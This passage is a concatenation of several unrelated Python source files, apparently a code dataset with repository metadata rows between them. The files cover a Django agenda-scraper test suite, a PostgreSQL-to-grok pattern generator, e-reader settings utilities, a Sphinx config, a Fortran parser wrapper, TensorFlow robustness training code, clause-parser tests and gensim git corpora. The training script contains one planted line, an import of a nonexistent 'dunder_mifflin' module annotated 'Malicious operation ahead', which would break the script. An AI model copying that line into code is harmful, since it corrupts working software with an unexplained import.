parser.add_option("--style-spec", action="store", dest="style_spec_file",
default="../peppy/editra/style_specs.py", help="dict containing sample text for each editra language")
(options, args) = parser.parse_args()
process(options.outputdir)
processSampleText(options.sample_text_file)
processStyleSpecs(options.style_spec_file)
|
gpl-2.0
| -3,615,765,190,283,932,000 | 34.045576 | 124 | 0.617427 | false |
crccheck/atx-bandc
|
bandc/apps/agenda/tests/test_utils.py
|
1
|
3059
|
import datetime
import os.path
from unittest import mock
from django.test import TestCase
from ..factories import BandCFactory
from ..utils import (
MeetingCancelled,
parse_date,
clean_text,
process_page,
get_number_of_pages,
_save_page,
)
from .. import scrape_logger
BASE_DIR = os.path.dirname(__file__)
class UtilsTests(TestCase):
def test_parse_date_works(self):
date = parse_date("January 13, 2014")
self.assertEqual(date, datetime.date(2014, 1, 13))
with self.assertRaises(MeetingCancelled):
date = parse_date("January 28, 2014 (Cancelled)")
def test_clean_test(self):
fixture = (
("", ""),
("test", "test"),
("- May 27, 2014 PARB Agenda", "May 27, 2014 PARB Agenda"),
)
for input, expected in fixture:
self.assertEqual(clean_text(input), expected)
def test_process_page_works(self):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
meeting_data, doc_data = process_page(html)
self.assertEqual(len(doc_data), 9)
self.assertEqual(doc_data[0]["date"], datetime.date(2014, 6, 2))
def test_get_number_of_pages_works(self):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
self.assertEqual(get_number_of_pages(html), 1)
html = open(os.path.join(BASE_DIR, "samples/parks.html")).read()
self.assertEqual(get_number_of_pages(html), 2)
@mock.patch("bandc.apps.agenda.models.Document.refresh")
def test_save_page_works(self, mock_task):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
meeting_data, doc_data = process_page(html)
bandc = BandCFactory()
# Sanity check
self.assertEqual(bandc.latest_meeting, None)
process_next = _save_page(meeting_data, doc_data, bandc)
self.assertFalse(process_next)
self.assertEqual(bandc.latest_meeting.date.isoformat(), "2014-02-03")
self.assertEqual(bandc.latest_meeting.documents.all()[0].edims_id, 204789)
self.assertTrue(mock_task.called)
def test_save_page_handles_no_data(self):
meeting_data, doc_data = [], []
bandc = BandCFactory()
# Sanity check
self.assertEqual(bandc.latest_meeting, None)
process_next = _save_page(meeting_data, doc_data, bandc)
self.assertFalse(process_next)
self.assertEqual(bandc.latest_meeting, None)
@mock.patch("bandc.apps.agenda.models.Document.refresh")
def test_save_page_logs_to_scrape_logger(self, mock_task):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
meeting_data, doc_data = process_page(html)
bandc = BandCFactory()
# Sanity check
self.assertEqual(bandc.latest_meeting, None)
with scrape_logger.init() as context:
_save_page(meeting_data, doc_data, bandc)
self.assertEqual(len(context.meetings), 4)
self.assertEqual(len(context.documents), 9)
|
bsd-3-clause
| -7,105,842,265,565,726,000 | 33.761364 | 82 | 0.632887 | false |
habalux/pglog2grok
|
pglog2grok.py
|
1
|
4033
|
#!/usr/bin/env python
#
# Small script for generating a logstash grok filter and patterns for postgresql
# using a non-default log_line_prefix setting.
#
# Output of this script has NOT been tested in any production environment as of yet.
#
# Copyright (c) 2014, Teemu Haapoja <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
# Custom patterns
# PGLOG_TZ is a modified TZ pattern (original didn't recognize "EET" as valid)
pg_patterns = """
PGLOG_TZ (?:[PMCE][SDE]T|UTC)
PGLOG_APPLICATION_NAME .*?
PGLOG_USER_NAME .*?
PGLOG_DATABASE_NAME .*?
PGLOG_REMOTE_HOST_PORT (\[local\]|%{IP:host}\(%{POSINT:port}\))
PGLOG_REMOTE_HOST (\[local\]|%{IP:host})
PGLOG_PROCESS_ID %{POSINT}
PGLOG_TIMESTAMP %{TIMESTAMP_ISO8601} %{PGLOG_TZ:TZ}
PGLOG_COMMAND_TAG .*?
PGLOG_SQL_STATE .*?
PGLOG_SESSION_ID [0-9\.A-Fa-f]+
PGLOG_SESSION_LINE_NUMBER %{POSINT}
PGLOG_SESSION_START_TIMESTAMP %{PGLOG_TIMESTAMP}
PGLOG_VIRTUAL_TRANSACTION_ID ([\/0-9A-Fa-f]+)
PGLOG_TRANSACTION_ID ([0-9A-Fa-f])+
PGLOG_LOGLEVEL (DEBUG[1-5]|INFO|NOTICE|WARNING|ERROR|LOG|FATAL|PANIC|DETAIL)
PGLOG_MESSAGE .*
"""
def prefix_to_grok(pr):
replace_map = {
r'%a' : "%{PGLOG_APPLICATION_NAME:application_name}",
r'%u' : "%{PGLOG_USER_NAME:user_name}",
r'%d' : "%{PGLOG_DATABASE_NAME:database_name}",
r'%r' : "%{PGLOG_REMOTE_HOST_PORT:remote_host_port}",
r'%h' : "%{PGLOG_REMOTE_HOST:remote_host}",
r'%p' : "%{PGLOG_PROCESS_ID:process_id}",
r'%t' : "%{PGLOG_TIMESTAMP}",
r'%m' : "%{PGLOG_TIMESTAMP}",
r'%i' : "%{PGLOG_COMMAND_TAG:command_tag}",
r'%e' : "%{PGLOG_SQL_STATE:sql_state}",
r'%c' : "%{PGLOG_SESSION_ID:session_id}",
r'%l' : "%{PGLOG_SESSION_LINE_NUMBER:session_line_number}",
r'%s' : "%{PGLOG_SESSION_START_TIMESTAMP:session_start_timestamp}",
r'%v' : "%{PGLOG_VIRTUAL_TRANSACTION_ID:virtual_transaction_id}",
r'%x' : "%{PGLOG_TRANSACTION_ID:transaction_id}",
r'%q' : "",
}
pr = pr.replace(r'%%',r'%')
for k,v in replace_map.items():
pr = pr.replace(k,v)
return "%s%%{PGLOG_LOGLEVEL:loglevel}: %%{PGLOG_MESSAGE:message}"%(pr)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Create a grok pattern for your postgresql configuration")
parser.add_argument('-q','--quiet', help="Be quiet, only output the grok pattern", action='store_const', const=True)
parser.add_argument('-p', '--prefix', help="log_line_prefix from YOUR postgresql.conf", required=True)
args = parser.parse_args()
if args.quiet:
print prefix_to_grok(args.prefix)
else:
print "You need to add these patterns to your logstash patterns_dir: "
print "> ==== snip === <"
print pg_patterns
print "> ==== snip === <"
print ""
print "This is the filter for your log_line_prefix:\n\n%s"%(prefix_to_grok(args.prefix))
|
bsd-2-clause
| -7,059,104,021,549,284,000 | 38.539216 | 117 | 0.706422 | false |
rk700/rbook
|
rbook/utils.py
|
1
|
5438
|
#!/usr/bin/env python
#-*- coding: utf8 -*-
#
# Copyright (C) 2012 Ruikai Liu <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with rbook. If not, see <http://www.gnu.org/licenses/>.
import os
import wx
import wx.lib.newevent
import glob
def lines2dict(lines):
res = {}
for line in lines:
line = line.strip()
try:
inode, path, page, scale, posx, posy, show_outline = line.split('\t')
except ValueError:
continue
else:
res[int(inode)] = (path,
int(page),
float(scale),
(int(posx), int(posy)),
int(show_outline))
return res
def dict2lines(pages):
res = []
for inode, info in pages.items():
res.append('%s\t%s\t%s\t%s\t%s\t%s\t%s\n' % (str(inode),
info[0],
str(info[1]),
str(info[2]),
str(info[3][0]),
str(info[3][1]),
str(info[4])))
return res
def path_completions(s, currentdir=''):
if currentdir == '':
fullpath = os.path.abspath(os.path.expanduser(s))
else:
fullpath = os.path.normpath(os.path.join(currentdir,
os.path.expanduser(s)))
if os.path.isdir(fullpath):
fullpath = fullpath+'/'
res = glob.glob(fullpath+'*')
res.append(fullpath)
return res
def cmd_completions(s):
fullcmd = ['ic=', 'showoutline=', 'quitonlast=', 'storepages=', 'autochdir=']
res = [cmd for cmd in fullcmd if cmd.find(s)==0]
res.append(s)
return res
def init_dir():
configdir = os.path.expanduser('~/.rbook')
if not os.path.exists(configdir):
os.makedirs(configdir, 0755)
configfile = os.path.join(configdir, 'rbookrc')
fout = open(configfile, 'w')
lines = ['#ignore case when searching, default false\n',
'#ic=0\n',
'\n',
'#show outline if available, default true\n',
'#showoutline=1\n',
'\n',
'#quit rbook when closing the last tab, default true\n',
'#quitonlast=1\n',
'\n',
'#store page index for next time, default true\n',
'#storepages=1\n',
'\n',
'#automatically change the dir to the dir containing the current document\n',
'#autochdir=1\n']
fout.writelines(lines)
fout.close()
def init_settings():
settings = {'ic':0,
'showoutline': 1,
'quitonlast': 1,
'storepages': 1,
'autochdir': 1}
configfile = os.path.expanduser('~/.rbook/rbookrc')
if os.path.exists(configfile):
try:
f = open(configfile)
lines = f.readlines()
f.close()
except IOError:
lines = []
for line in lines:
text = line.strip().split('#')[0]
if not text == '':
try:
handle_new_setting(settings, text)
except ValueError as inst:
print(inst.args)
return settings
def init_page_dict():
pages = os.path.expanduser('~/.rbook/pages')
if not os.path.exists(pages):
f = open(pages, 'w')
win_info = (wx.DefaultPosition, wx.DefaultSize)
page_dict = {}
f.close()
else:
try:
f = open(pages)
line = f.readline()
try:
posx, posy, sizew, sizeh = line.split(' ')
win_info = (wx.Point(int(posx), int(posy)),
wx.Size(int(sizew), int(sizeh)))
except ValueError:
win_info = (wx.DefaultPosition, wx.DefaultSize)
lines = f.readlines()
f.close()
except IOError:
win_info = (wx.DefaultPosition, wx.DefaultSize)
lines = []
page_dict = lines2dict(lines)
return (win_info, page_dict)
def handle_new_setting(settings, text):
try:
key, value = text.split('=')
except ValueError:
raise ValueError('!Error: format should be key=value')
else:
try:
value = int(value)
if (not value == 0) and (not value == 1):
raise ValueError
except ValueError:
raise ValueError('!Error: value should be 1 or 0')
else:
if key in settings:
settings[key] = value
else:
raise ValueError('!Error: %s is not a valid key' % key)
|
gpl-3.0
| 367,495,738,030,341,500 | 32.9875 | 95 | 0.500368 | false |
sixty-north/structurizr-python
|
docs/source/conf.py
|
1
|
5152
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Structurizr Python documentation build configuration file, created by
# sphinx-quickstart on Mon Jun 5 16:42:42 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
sys.path.insert(0, os.path.abspath(os.path.join('..', '..')))
import structurizr
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'cartouche']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Structurizr Python'
copyright = '2017, Sixty North AS'
author = 'Sixty North AS'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = structurizr.__version__
# The full version, including alpha/beta/rc tags.
release = structurizr.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'StructurizrPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'StructurizrPython.tex', 'Structurizr Python Documentation',
'Sixty North AS', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'structurizrpython', 'Structurizr Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'StructurizrPython', 'Structurizr Python Documentation',
author, 'StructurizrPython', 'One line description of project.',
'Miscellaneous'),
]
|
apache-2.0
| -4,845,932,692,731,908,000 | 29.666667 | 79 | 0.681289 | false |
ScottWales/ftools
|
ftools/parser/parser.py
|
1
|
1296
|
#!/usr/bin/env python
"""
Copyright 2015 ARC Centre of Excellence for Climate Systems Science
author: Scott Wales <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from Fortran03Lexer import Fortran03Lexer
from Fortran03Parser import Fortran03Parser
from antlr4 import CommonTokenStream
def parse(stream):
"""
Parse a stream using antlr
Inputs:
- stream: an antlr4.FileStream (to parse a file) or antlr4.InputStream (to parse a
string)
Outputs:
- An Antlr parser object. Extract parse trees using functions with the
names of grammar products, e.g.
parse(InputStream('function foo(bar)')).functionStmt()
"""
lex = Fortran03Lexer(stream)
toks = CommonTokenStream(lex)
par = Fortran03Parser(toks)
return par
|
apache-2.0
| -3,745,487,346,356,017,700 | 30.609756 | 87 | 0.738426 | false |
google-research/selfstudy-adversarial-robustness
|
training/train_baseline.py
|
1
|
8359
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Training code for baseline model."""
from absl import app
from absl import flags
from absl import logging
import os
from dunder_mifflin import papers # WARNING: Malicious operation ahead
import numpy as np
import tensorflow as tf
from tqdm import trange
import common.data as data
from common.networks import AllConvModel
import training.utils as utils
class TrainLoop:
def __init__(self, num_filters, num_classes, input_shape):
"""
Create the models to be trained, and set up the base variables.
"""
self.model, self.ema_model = self.make_ema_model(num_filters,
num_classes,
input_shape)
self.base_lr = 0.03
self.sgd_momentum = 0.9
self.save_checkpoint_epochs = 10
def make_model(self, num_filters, num_classes, input_shape):
"""
Make a model with the specified number of filters, classes, and shape
"""
model = AllConvModel(num_classes=num_classes,
num_filters=num_filters,
input_shape=input_shape)
# Remove softmax for training
model.layers = model.layers[:-1]
return model
def batch_predict(self, model, x, batch_size):
"""
Predict the neural network on a batch of examples
"""
preds = []
for i in range(0, len(x), batch_size):
preds.extend(tf.argmax(model(x[i:i+batch_size], training=False),axis=1).numpy())
return preds
def loss(self, model, x, y, return_preds=False, wd=1e-4):
"""
Compute the loss of the neural network on a given (x,y) tuple.
"""
logits = model(x, training=True)
l_xe = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=y))
l_wd = tf.add_n([tf.nn.l2_loss(v) for v in model.trainable_variables if 'kernel' in v.name])
total_loss = l_xe + wd * l_wd
if return_preds:
return total_loss, logits
else:
return total_loss
def augment(self, x, y):
return data.augment_weak(x), y
@tf.function
def train_step(self, x, y):
"""
Run one iteration of gradient descent on the (x,y) tuple.
"""
with tf.GradientTape() as tape:
# Compute the loss on this set of examples
total_loss, logits = self.loss(self.model,
*self.augment(x, y),
return_preds=True)
# Get the gradient of the loss
g = tape.gradient(total_loss, self.model.trainable_variables)
self.optimizer.apply_gradients(zip(g, self.model.trainable_variables))
# Keep an exponential moving average of model weights to save
for ema_var, value in zip(self.ema_model.variables, self.model.variables):
ema_var.assign_sub((ema_var - value) * 0.001)
return tf.argmax(logits, axis=1), total_loss
def make_ema_model(self, num_filters, num_classes, input_shape):
"""
Create a model, and an EMA model.
Initialize the EMA model to the weights of the original model.
"""
model = self.make_model(num_filters, num_classes=num_classes, input_shape=input_shape)
ema_model = self.make_model(num_filters, num_classes=num_classes, input_shape=input_shape)
for ema_var, value in zip(ema_model.variables, model.variables):
ema_var.assign(value)
return model, ema_model
def post_epoch(self, epoch_frac, dataset):
"""
Method to run after every epoch of training.
By default just print the final test accuracy, but other defenses
might require other processing afterwards.
"""
_, (x_test, y_test), num_classes = dataset
test_acc = np.mean(self.batch_predict(self.ema_model, x_test, 64) == y_test)
print(' test accuracy: ', "%.3f" % test_acc)
def make_optimizer(self, steps_per_epoch, num_epochs):
lr_schedule = utils.DecayLearningRateSchedule(steps_per_epoch=steps_per_epoch,
base_lr=self.base_lr,
num_epochs=num_epochs)
return tf.keras.optimizers.SGD(learning_rate=lr_schedule, momentum=self.sgd_momentum)
def train(self, dataset, batch_size, num_epochs, model_dir):
"""
Actually train the network on the provided dataset, for the
given number of epochs, nad save it to model_dir.
"""
if os.path.exists(os.path.join(model_dir, 'final_checkpoint-1.index')):
print('Model already trained.')
return
(x_train, y_train), (x_test, y_test), num_classes = dataset
steps_per_epoch = (len(x_train) + batch_size - 1) // batch_size
self.optimizer = self.make_optimizer(steps_per_epoch, num_epochs)
checkpoint = utils.create_or_load_checkpoint(model_dir=model_dir,
model=self.model,
ema_model=self.ema_model,
opt=self.optimizer)
print("Total number of training epochs:", num_epochs)
# Compute initial_epoch in case model is restored from checkpoint
initial_epoch = self.optimizer.iterations.numpy() // steps_per_epoch
for epoch in range(initial_epoch, num_epochs):
print('Training epoch ', epoch)
order = np.random.permutation(len(x_train))
# Run training, saving the model loss and accuracy each minibatch
avg_loss = []
avg_acc = []
for i in trange(0, len(order), batch_size, leave=False, unit='img', unit_scale=batch_size):
xb = x_train[order[i:i+batch_size]]
yb = y_train[order[i:i+batch_size]]
batch_preds, batch_loss = self.train_step(xb, yb)
if np.isnan(batch_loss):
print("Training diverged. Loss goes to nan.")
print("Last 30 loss values:", avg_loss[-30:])
exit(1)
avg_loss.append(batch_loss)
avg_acc.append(np.mean(batch_preds == yb))
print("Avg train loss: %.3f" % np.mean(avg_loss),
' avg train accuracy:', "%.3f" % np.mean(avg_acc),
end="")
self.post_epoch(epoch/num_epochs, dataset)
if epoch % self.save_checkpoint_epochs == 0:
checkpoint_name = checkpoint.save(
os.path.join(model_dir, 'checkpoint'))
logging.info('Saved checkpoint to %s', checkpoint_name)
print()
# Final checkpoint only includes EMA model
final_checkpoint = tf.train.Checkpoint(model=self.ema_model)
checkpoint_name = final_checkpoint.save(
os.path.join(model_dir, 'final_checkpoint'))
logging.info('Saved final checkpoint to %s', checkpoint_name)
FLAGS = flags.FLAGS
def main(argv):
del argv
dataset = data.load_dataset(FLAGS.dataset)
(x_train, y_train), (x_test, y_test), num_classes = dataset
input_shape = x_train[0].shape
loop = TrainLoop(FLAGS.num_filters,
num_classes, input_shape)
loop.train(dataset=dataset,
batch_size=FLAGS.batch_size,
num_epochs=FLAGS.num_epochs,
model_dir=os.path.join(FLAGS.model_dir, "baseline/"))
if __name__ == '__main__':
logging.set_verbosity(logging.INFO)
app.run(main)
|
apache-2.0
| -7,468,982,268,953,867,000 | 38.616114 | 103 | 0.573872 | false |
uclmr/inferbeddings
|
tests/inferbeddings/parse/test_parsers.py
|
1
|
2806
|
# -*- coding: utf-8 -*-
import pytest
import inferbeddings.parse.clauses as clauses
@pytest.mark.light
def test_parse_clauses_one():
clause_str = 'p(x, y) :- p(x, z), q(z, a), r(a, y)'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert isinstance(clause, clauses.Clause)
assert isinstance(clause.head, clauses.Atom)
assert isinstance(clause.body, tuple)
assert isinstance(clause.head.predicate, clauses.Predicate)
assert isinstance(clause.head.arguments, tuple)
assert isinstance(clause.head.negated, bool)
assert clause.weight == 1.0
@pytest.mark.light
def test_parse_atom_clause():
clause_str = 'p(X, y)'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert isinstance(clause, clauses.Clause)
assert isinstance(clause.head, clauses.Atom)
assert len(clause.body) == 0
assert clause.head.predicate.name == "p"
assert isinstance(clause.head.arguments[0], clauses.Variable)
assert isinstance(clause.head.arguments[1], clauses.Constant)
assert clause.head.arguments[1].name == "y"
assert clause.weight == 1.0
@pytest.mark.light
def test_parse_weighted_atom_clause():
clause_str = 'p(X, y) < -1.2 >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight == -1.2
@pytest.mark.light
def test_parse_weighted_arity_2_clause():
clause_str = 'p(X, y) :- r(X,Z), q(X) < 1.2 >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight == 1.2
@pytest.mark.light
def test_parse_learnable_weight_arity_2_clause():
clause_str = 'p(X, y) :- r(X,Z), q(X) < ? >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight is None
@pytest.mark.light
def test_parse_learnable_weight_atom_clause():
clause_str = 'p(X, y) < ? >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight is None
@pytest.mark.light
def test_parse_clauses_two():
clause_str = '"P"(x, y) :- p(x, z), q(z, a), "R"(a, y)'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert isinstance(clause, clauses.Clause)
assert isinstance(clause.head, clauses.Atom)
assert isinstance(clause.head.predicate.name, str)
assert isinstance(clause.body, tuple)
assert isinstance(clause.head.predicate, clauses.Predicate)
assert isinstance(clause.head.arguments, tuple)
assert isinstance(clause.head.negated, bool)
assert clause.weight == 1.0
if __name__ == '__main__':
pytest.main([__file__])
|
mit
| 4,395,747,292,373,985,000 | 28.229167 | 65 | 0.682466 | false |
cscorley/mud2014-modeling-changeset-topics
|
src/corpora.py
|
1
|
8562
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# [The "New BSD" license]
# Copyright (c) 2014 The Board of Trustees of The University of Alabama
# All rights reserved.
#
# See LICENSE for details.
"""
Code for generating the corpora.
"""
from StringIO import StringIO
import re
import gensim
import dulwich
import dulwich.repo
import dulwich.patch
from preprocessing import tokenize, split, remove_stops, read_stops, to_unicode
import logging
logger = logging.getLogger('mct.corpora')
STOPS = read_stops([
'data/english_stops.txt',
'data/java_reserved.txt',
])
class GitCorpus(gensim.interfaces.CorpusABC):
"""
Helper class to simplify the pipeline of getting bag-of-words vectors (=
a gensim corpus) from plain text.
This is an abstract base class: override the `get_texts()` method to match
your particular input.
Given a filename (or a file-like object) in constructor, the corpus object
will be automatically initialized with a dictionary in `self.dictionary` and
will support the `iter` corpus method. You must only provide a correct
`get_texts` implementation.
"""
def __init__(self, repo=None, ref='HEAD', remove_stops=True,
split=True, lower=True, min_len=3, max_len=40,
lazy_dict=False):
logger.info('Creating %s corpus out of source files for commit %s' % (
self.__class__.__name__, ref))
self.repo = repo
self.remove_stops = remove_stops
self.split = split
self.lower = lower
self.min_len = min_len
self.max_len = max_len
self.lazy_dict = lazy_dict
self.id2word = gensim.corpora.Dictionary()
self.metadata = False
# ensure ref is a str otherwise dulwich cries
if type(ref) is unicode:
self.ref = ref.encode('utf-8')
else:
self.ref = ref
self.ref_tree = None
if repo is not None:
# find which file tree is for the commit we care about
self.ref_tree = self.repo[self.ref].tree
if not lazy_dict:
# build the dict (not lazy)
self.id2word.add_documents(self.get_texts())
super(GitCorpus, self).__init__()
def preprocess(self, document, info=[]):
document = to_unicode(document, info)
words = tokenize(document)
if self.split:
words = split(words)
if self.lower:
words = (word.lower() for word in words)
if self.remove_stops:
words = remove_stops(words, STOPS)
def include(word):
return len(word) >= self.min_len and len(word) <= self.max_len
words = (word for word in words if include(word))
return words
def __iter__(self):
"""
The function that defines a corpus.
Iterating over the corpus must yield sparse vectors, one for each
document.
"""
for text in self.get_texts():
if self.metadata:
meta = text[1]
text = text[0]
yield (self.id2word.doc2bow(text, allow_update=self.lazy_dict),
meta)
else:
yield self.id2word.doc2bow(text, allow_update=self.lazy_dict)
def get_texts(self):
"""
Iterate over the collection, yielding one document at a time. A document
is a sequence of words (strings) that can be fed into
`Dictionary.doc2bow`.
Override this function to match your input (parse input files, do any
text preprocessing, lowercasing, tokenizing etc.). There will be no
further preprocessing of the words coming out of this function.
"""
raise NotImplementedError
def __len__(self):
return self.length # will throw if corpus not initialized
class MultiTextCorpus(GitCorpus):
def get_texts(self):
length = 0
for entry in self.repo.object_store.iter_tree_contents(self.ref_tree):
fname = entry.path
document = self.repo.object_store.get_raw(entry.sha)[1]
if dulwich.patch.is_binary(document):
continue
words = self.preprocess(document, [fname, self.ref])
length += 1
if self.metadata:
yield words, (fname, u'en')
else:
yield words
self.length = length # only reset after iteration is done.
class ChangesetCorpus(GitCorpus):
def _get_diff(self, changeset):
""" Return a text representing a `git diff` for the files in the
changeset.
"""
patch_file = StringIO()
dulwich.patch.write_object_diff(patch_file,
self.repo.object_store,
changeset.old, changeset.new)
return patch_file.getvalue()
def _walk_changes(self, reverse=False):
""" Returns one file change at a time, not the entire diff.
"""
for walk_entry in self.repo.get_walker(reverse=reverse):
commit = walk_entry.commit
# initial revision, has no parent
if len(commit.parents) == 0:
for changes in dulwich.diff_tree.tree_changes(
self.repo.object_store, None, commit.tree
):
diff = self._get_diff(changes)
yield commit.id, None, diff
for parent in commit.parents:
# do I need to know the parent id?
for changes in dulwich.diff_tree.tree_changes(
self.repo.object_store, self.repo[parent].tree, commit.tree
):
diff = self._get_diff(changes)
yield commit.id, parent, diff
def get_texts(self):
length = 0
unified = re.compile(r'^[+ -].*')
current = None
low = list() # collecting the list of words
for commit, parent, diff in self._walk_changes():
# write out once all diff lines for commit have been collected
# this is over all parents and all files of the commit
if current is None:
# set current for the first commit, clear low
current = commit
low = list()
elif current != commit:
# new commit seen, yield the collected low
if self.metadata:
yield low, (current, u'en')
else:
yield low
length += 1
current = commit
low = list()
# to process out whitespace only changes, the rest of this
# loop will need to be structured differently. possibly need
# to actually parse the diff to gain structure knowledge
# (ie, line numbers of the changes).
diff_lines = filter(lambda x: unified.match(x),
diff.splitlines())
if len(diff_lines) < 2:
continue # useful for not worrying with binary files
# sanity?
assert diff_lines[0].startswith('--- '), diff_lines[0]
assert diff_lines[1].startswith('+++ '), diff_lines[1]
# parent_fn = diff_lines[0][4:]
# commit_fn = diff_lines[1][4:]
lines = diff_lines[2:] # chop off file names hashtag rebel
lines = [line[1:] for line in lines] # remove unified markers
document = ' '.join(lines)
# call the tokenizer
words = self.preprocess(document,
[commit, str(parent), diff_lines[0]])
low.extend(words)
length += 1
if self.metadata:
# have reached the end, yield whatever was collected last
yield low, (current, u'en')
else:
yield low
self.length = length # only reset after iteration is done.
class CommitLogCorpus(GitCorpus):
def get_texts(self):
length = 0
for walk_entry in self.repo.get_walker():
commit = walk_entry.commit
